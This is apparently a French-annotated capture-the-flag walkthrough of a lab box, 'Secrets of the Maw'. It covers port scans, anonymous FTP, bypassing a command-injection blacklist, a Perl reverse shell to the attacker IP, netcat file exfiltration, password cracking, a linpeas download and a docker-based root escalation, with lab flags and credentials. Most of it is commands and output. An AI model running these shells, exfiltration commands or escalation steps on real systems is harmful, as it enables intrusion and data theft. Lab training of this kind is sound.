Secrets of the Maw

IP Address
10.10.206.54

$> nmap -vv 10.10.206.54 -p-
Starting Nmap 7.60 ( https://nmap.org ) at 2024-05-21 10:12 BST
Initiating ARP Ping Scan at 10:12
Scanning 10.10.206.54 [1 port]
Completed ARP Ping Scan at 10:12, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:12
Completed Parallel DNS resolution of 1 host. at 10:12, 0.00s elapsed
Initiating SYN Stealth Scan at 10:12
Scanning ip-10-10-206-54.eu-west-1.compute.internal (10.10.206.54) [65535 ports]
Discovered open port 80/tcp on 10.10.206.54
Discovered open port 22/tcp on 10.10.206.54
Discovered open port 21/tcp on 10.10.206.54

port 80 : web
port 22 : SSH
port 21 : FTP

$> gobuster dir -u 10.10.206.54 -w Tools/wordlists/SecLists/Discovery/Web-Content/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.206.54
[+] Threads:        10
[+] Wordlist:       Tools/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/05/21 13:50:21 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/css (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2024/05/21 13:50:23 Finished
===============================================================

$> ftp 10.10.206.54
Connected to 10.10.206.54.
220 (vsFTPd 3.0.3)
Name (10.10.206.54:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

anonymous est le nom le + utilisé pour les serveurs ftp

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        115          4096 Jan 21  2022 .
drwxr-xr-x    2 0        115          4096 Jan 21  2022 ..
-rw-r--r--    1 1001     1001           78 Jan 21  2022 .nomes
226 Directory send OK.

ftp> get .nomes
local: .nomes remote: .nomes
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .nomes (78 bytes).
226 Transfer complete.
78 bytes received in 0.00 secs (629.5197 kB/s)

get (permet de envoyer le fichier du serveur ftp vers notre terminal)

$> cat .nomes
You find a nome hidding around, you hug it... You feel a little bit relieved!

$> gobuster dir -u 10.10.238.151/ -w Tools/wordlists/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.238.151/
[+] Threads:        10
[+] Wordlist:       Tools/wordlists/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/05/21 15:46:56 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/discrete (Status: 301)
/server-status (Status: 403)
===============================================================
2024/05/21 15:47:22 Finished
===============================================================

view-source:http://10.10.238.151/discrete
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<link rel="stylesheet" href="../css/style.css">
		<title>Secrets of the Maw</title>
		<style>
			body {
				background-image: url('images/quiet.gif');
				flex-direction: column;
				justify-content: flex-end;
				align-items: center;
			}
		</style>
	</head>
	<body>
					<h1 style="color:blue;text-align: center;overflow-wrap: anywhere;"></h1>
				<form method="POST">
			<input type="text" name="cmd" placeholder="How to escape ?">
			<button>Escape ?</button>
		</form>
	</body>
</html>

sudo -l
Matching Defaults entries for www-data on the-maw: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on the-maw: (six) NOPASSWD: /home/six/.musicbox 

/home/six/.musicbox 
 \u2669\u266a\u266a\u266b\u266b\u266c\u266b\u266c\u266c\u266a\u266a\u266c\u266b\u2669 You entered It didn't worked... 

echo "cat /home/six/user.txt" | sudo -u six /home/six/.musicbox
 \u2669\u266a\u266a\u266b\u266b\u266c\u266b\u266c\u266c\u266a\u266a\u266c\u266b\u2669 You entered cat /home/six/user.txt EPI{I_MuS7_F1nD_@_W4y_0Ut} It didn't worked... 

IP OPENVPN:
10.9.1.29

pour ouvrir port 4444:
sudo firewall-cmd --add-port=4444/tcp
sur ordi écoute:
nc -lvnp 4444 
sur site discrete (celui qu'on veut attaquer)
Reverse shell en perl (python, bash et php ne marche pas)
s;perl -e 'use Socket;$i="10.9.1.29";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

$ ls -a
.
..
.bash_history
.bash_logout
.bashrc
.cache
.gnupg
.musicbox
.profile
user.txt
$ cat .musicbox	
#!/bin/bash

echo
echo " ♩♪♪♫♫♬♫♬♬♪♪♬♫♩ "
echo

read -p "Stop the box ? (y/n): " rep

echo "You entered $rep"; $rep 2>/dev/null

echo "It didn't worked..."


$ cat index.php
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<link rel="stylesheet" href="../css/style.css">
		<title>Secrets of the Maw</title>
		<style>
			body {
				background-image: url('images/quiet.gif');
				flex-direction: column;
				justify-content: flex-end;
				align-items: center;
			}
		</style>
	</head>
	<body>
		<?php
			$found = false;
			if(isset($_POST['cmd'])) {
				$cmd = $_POST['cmd'];
				$store = explode(" ",$cmd);
				$blacklist = array('nc', 'python', 'bash','php','perl','ruby','rm','cat','head','tail','python3','more','less','sh','ls');
				for ($i=0; $i<count($store); $i++)
					for ($j=0; $j<count($blacklist); $j++)
						if ($store[$i] == $blacklist[$j])
							$found = true;
			}
			if ($found):
		?>
			<h1 style="color:red;">You weren't discrete ! Hide quickly or he's going to find you!</h1>
			<style>
				body {background-image: url('images/found.gif');}
			</style>
		<?php else: ?>
			<h1 style="color:blue;text-align: center;overflow-wrap: anywhere;"><?= shell_exec($_POST['cmd']) ?></h1>
		<?php endif; ?>
		<form method="POST">
			<input type="text" name="cmd" placeholder="How to escape ?">
			<button>Escape ?</button>
		</form>
	</body>
</html>


$ ls
css
discrete
images
index.html
$ pwd
/var/www/html

$ cd ..
$ ls
files
html
$ cd files
$ ls
account.php
efce5bb6c4a73bf05bc66ab889712230.php
images
index.php
style.css
$ cat index.php
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<link rel="stylesheet" type="text/css" href="style.css">
		<title>Secrets of the Maw</title>
	</head>
	<body>
		<?php
		if(isset($_POST['submit'])) {
			$username = $_POST['username'];
			$password = $_POST['password'];
			ob_start();
			session_start();
			try {
				$con = new PDO("mysql:dbname=webportal;host=localhost","root","!@m+her00+@db");
				$con->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_WARNING);
			}
			catch(PDOException $e) {
				exit("Connection failed ". $e->getMessage());
			}
			require_once("account.php");
			$account = new Account($con);
			$success = $account->login($username,$password);
			if ($success) {
				header("Location: efce5bb6c4a73bf05bc66ab889712230.php");
			}
		}
		?>
		<h1>The Maw's hidden portal</h1>
		<form method="POST">
			<input type="text" name="username" id="username" placeholder="Login ?" required>
			<input type="password" name="password" id="password" placeholder="Password ?" required>
			<input type="submit" name="submit" value="Submit ?">
		</form>
	</body>
</html>
$ cat account.php
<?php

class Account
{
	public function __construct($con)
	{
		$this->con = $con;
	}
	public function login($un,$pw)
	{
		$pw = hash("md5",$pw);
		$query = $this->con->prepare("SELECT * FROM users WHERE username='$un' AND password='$pw'");
		$query->execute();
		return $query->rowCount() >= 1;
	}
}

?>
$ cat efce5bb6c4a73bf05bc66ab889712230.php
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<title>Document</title>
		<link rel="stylesheet" href="../style.css">
	</head>
	<body>
		<img style="width:5em" src="images/musicbox.jpg"><br>
		<h1>Find what's inside the music box !</h1>
	</body>
</html>

<style>
body {
  background-image: url('images/maw.jpg');
}
</style>

$ cd images
$ ls
eyes.png
maw.jpg
musicbox.jpg

Sur la machine locale:
sudo firewall-cmd --add-port=5555/tcp
nc -lvnp 5555 > eyes.png

Sur la machine distante :
cat musicbox.jpg | nc 10.9.1.29 5555

réccupération du fichier musicbox.jpg étant donnée qu'il faut trouver quelque chose dedans selon efce5bb6c4a73bf05bc66ab889712230.php (qui est la page après qu'on soit co)

pour tout réccup avec folder
machine locale:
mkdir -p files/images html/css html/discrete/images html/images; nc -lvnp 5555 > files/account.php & nc -lvnp 5556 > files/efce5bb6c4a73bf05bc66ab889712230.php & nc -lvnp 5557 > files/index.php & nc -lvnp 5558 > files/style.css & nc -lvnp 5559 > files/images/eyes.png & nc -lvnp 5560 > files/images/maw.jpg & nc -lvnp 5561 > files/images/musicbox.jpg & nc -lvnp 5562 > html/index.html & nc -lvnp 5563 > html/css/style.css & nc -lvnp 5564 > html/discrete/index.php & nc -lvnp 5565 > html/discrete/images/found.gif & nc -lvnp 5566 > html/discrete/images/quiet.gif & nc -lvnp 5567 > html/images/blind.gif &
machine distante:
local_ip="10.9.1.29"; nc $local_ip 5555 < files/account.php & nc $local_ip 5556 < files/efce5bb6c4a73bf05bc66ab889712230.php & nc $local_ip 5557 < files/index.php & nc $local_ip 5558 < files/style.css & nc $local_ip 5559 < files/images/eyes.png & nc $local_ip 5560 < files/images/maw.jpg & nc $local_ip 5561 < files/images/musicbox.jpg & nc $local_ip 5562 < html/index.html & nc $local_ip 5563 < html/css/style.css & nc $local_ip 5564 < html/discrete/index.php & nc $local_ip 5565 < html/discrete/images/found.gif & nc $local_ip 5566 < html/discrete/images/quiet.gif & nc $local_ip 5567 < html/images/blind.gif &

utilisation de stegcracker:
pip3 install stegcracker (pour installer)
permet de trouver le mot de passe crack sur fichier

stegcracker musicbox.jpg rockyou.txt 
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2024 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which 
will blast through the rockyou.txt wordlist within 1.9 second as opposed 
to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

Counting lines in wordlist..
Attacking file 'musicbox.jpg' with wordlist 'rockyou.txt'..
Successfully cracked file with password: nightmare
Tried 1989 passwords
Your file has been written to: musicbox.jpg.out
nightmare

steghide extract -sf musicbox.jpg
Enter passphrase: 
wrote extracted data to "backup.zip".

mot de passe dans le fichier zip => utilisation de john the ripper

$ git clone https://github.com/openwall/john
$ cd john/src
$ ./configure && make

cd run/
./zip2john ../../backup.zip > protected.hash
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: TS_chk, cmplen=551, decmplen=1210, crc=E3912D4C ts=6E02 cs=6e02 type=8
[loic@fedora run]$ ./john protected.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2024-05-24 11:26) 0g/s 1996Kp/s 1996Kc/s 1996KC/s Cphp1900..Php1900
Proceeding with wordlist:./password.lst
Enabling duplicate candidate password suppressor
Telekinesis      (backup.zip/source_code.php)     
1g 0:00:00:00 DONE 2/3 (2024-05-24 11:26) 1.099g/s 4102Kp/s 4102Kc/s 4102KC/s Tangles1..Goodfriday
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

./john --show protected.hash
backup.zip/source_code.php:Telekinesis:source_code.php:backup.zip::../../backup.zip

1 password hash cracked, 0 left

fichier source_code.php:
user : Mono (Welcome Mono)
mot de passe : base64_encode($password) == "SV9NdVN0X1N0MHBfVGgzX1RoaW5fbTRu"

utilisation de CyberChef:
en base64 : I_MuSt_St0p_Th3_Thin_m4n

ssh mono@10.10.66.215
The authenticity of host '10.10.66.215 (10.10.66.215)' can't be established.
ECDSA key fingerprint is SHA256:ybdflPQMn6OfMBIxgwN4h00kin8TEPN7r8NYtmsx3c8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.66.215' (ECDSA) to the list of known hosts.
mono@10.10.66.215's password: 

loic@fedora:~$ touch linpeas.sh
loic@fedora:~$ nano linpeas.sh 
loic@fedora:~$ sudo python3 -m http.server 5555
[sudo] password for loic: 
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
10.10.109.48 - - [12/Jun/2024 17:28:28] "GET /linpeas.sh HTTP/1.1" 200 -

mono@the-maw:~$ wget http://10.21.7.245:5555/linpeas.sh
--2024-06-12 15:34:14--  http://10.21.7.245:5555/linpeas.sh
Connecting to 10.21.7.245:5555... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847924 (828K) [application/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                                      100%[=====================================================================================================>] 828.05K  4.05MB/s    in 0.2s    

2024-06-12 15:34:15 (4.05 MB/s) - ‘linpeas.sh’ saved [847924/847924]

mono@the-maw:~$ chmod +x linpeas.sh
mono@the-maw:~$ ./linpeas.sh 

RED/YELLOW: 95% a PE vector
User & Groups: uid=1002(mono) gid=1002(mono) groups=1002(mono),999(docker)


docker installé :
https://flast101.github.io/docker-privesc/

GTFOBins:
 docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# ls
bin  boot  cdrom  dev  etc  home  initrd.img  initrd.img.old  lib  lib64  lost+found  media  mnt  opt  proc  root  run	sbin  snap  srv  swap.img  sys	tmp  usr  var  vmlinuz	vmlinuz.old
# cd /root
# ls
root.txt
# cat root.txt
EPI{Th3_Th1N_M4n_1S_C0m1Ng}
